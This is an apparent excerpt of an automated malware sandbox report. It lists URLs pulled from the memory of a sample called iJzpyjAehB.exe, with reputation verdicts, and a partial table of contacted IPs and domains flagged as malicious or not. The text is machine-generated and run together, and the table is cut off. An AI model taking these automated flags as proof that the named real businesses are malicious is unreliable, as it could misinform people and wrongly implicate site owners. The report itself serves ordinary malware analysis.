                                                                                                                                                                                                                                                              http://www.indonesiamedia.com/wp-content/themes/mag-theme/images/body-BG.pngsvchost.exe, 00000016.00000003.496913823.000000000332A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                              http://www.pcgrate.com/wp-content/plugins/woo-discount-rules/v2/Assets/Js/site_main.js?ver=2.3.7iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                              http://www.jenco.co.uk/npigalicapi.exe, 00000006.00000003.338019640.0000000007540000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                              http://www.myropcb.com/why-use-myro/terms-of-service/iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                              http://www.pcgrate.comiJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                              https://lolipop.jp/iJzpyjAehB.exe, 00000000.00000003.278941119.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.275586647.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.421181826.0000000002540000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.278509190.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.267669316.0000000008D00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.274065414.0000000003600000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.275803176.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.414643624.0000000000A60000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.271358037.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.274386745.0000000003560000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                                                https://www.com-sit.com/feed/iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.473713643.0000000005150000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.478763378.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                                                  http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/share-link/share-link.min.js?ver=3.3.iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                                  https://www.cloudflare.com?utm_source=challenge&utm_campaign=miJzpyjAehB.exe, 00000000.00000003.278941119.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.275586647.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.421181826.0000000002540000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.278509190.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.274065414.0000000003600000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.275803176.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.268618065.0000000008700000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.271358037.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.274386745.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.277227725.0000000003570000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                                                    https://www.naoi-a.com/iJzpyjAehB.exe, 00000000.00000003.278941119.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.275586647.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.423834877.0000000008B00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.278509190.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.275803176.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.277227725.0000000003570000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                    http://www.rsag.infodiJzpyjAehB.exe, 00000000.00000002.603177646.00000000075B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                    http://www.jenco.co.uk/spigalicapi.exe, 00000002.00000003.478666450.000000000734F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                    http://www.speelhal.net/RiJzpyjAehB.exe, 00000000.00000002.603177646.00000000075B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                    https://www.pcgrate.comiJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                    http://www.myropcb.com/wp-content/themes/framePCB/images/shopping_car.pngiJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                    http://www.mobilnic.net/upload/img/201905280859514872.pngiJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438940303.0000000003090000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                    http://www.com-sit.com/wp-content/themes/betheme/js/plugins/countdown.min.js?ver=26.6iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                                                      https://www.com-sit.com/es/iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                                        • 75% < No. of IPs
                                                                                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                                        192.252.159.165
                                                                                                                                                                                                                                                                        icd-host.comUnited States
                                                                                                                                                                                                                                                                        3561CENTURYLINK-LEGACY-SAVVISUStrue
                                                                                                                                                                                                                                                                        217.69.139.150
                                                                                                                                                                                                                                                                        mxs.mail.ruRussian Federation
                                                                                                                                                                                                                                                                        47764MAILRU-ASMailRuRUtrue
                                                                                                                                                                                                                                                                        198.49.23.145
                                                                                                                                                                                                                                                                        mijash3.comUnited States
                                                                                                                                                                                                                                                                        53831SQUARESPACEUStrue
                                                                                                                                                                                                                                                                        107.180.58.31
                                                                                                                                                                                                                                                                        orbitgas.comUnited States
                                                                                                                                                                                                                                                                        26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                                                                                                                                                                                                                                        203.137.75.45
                                                                                                                                                                                                                                                                        okashimo.comJapan4694IDCFIDCFrontierIncJPtrue
                                                                                                                                                                                                                                                                        172.67.152.159
                                                                                                                                                                                                                                                                        www.tvtools.fiUnited States
                                                                                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                        5.79.79.212
                                                                                                                                                                                                                                                                        unknownNetherlands
                                                                                                                                                                                                                                                                        60781LEASEWEB-NL-AMS-01NetherlandsNLfalse
                                                                                                                                                                                                                                                                        153.126.211.112
                                                                                                                                                                                                                                                                        mikihan.comJapan7684SAKURA-ASAKURAInternetIncJPtrue
                                                                                                                                                                                                                                                                        217.160.0.131
                                                                                                                                                                                                                                                                        mackusick.deGermany
                                                                                                                                                                                                                                                                        8560ONEANDONE-ASBrauerstrasse48DEfalse
                                                                                                                                                                                                                                                                        3.130.204.160
                                                                                                                                                                                                                                                                        hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.comUnited States
                                                                                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                        49.212.243.77
                                                                                                                                                                                                                                                                        listel.co.jpJapan9371SAKURA-CSAKURAInternetIncJPtrue
                                                                                                                                                                                                                                                                        5.189.171.125
                                                                                                                                                                                                                                                                        muhr-soehne.deGermany
                                                                                                                                                                                                                                                                        51167CONTABODEfalse
                                                                                                                                                                                                                                                                        194.143.194.23
                                                                                                                                                                                                                                                                        reproar.comSpain
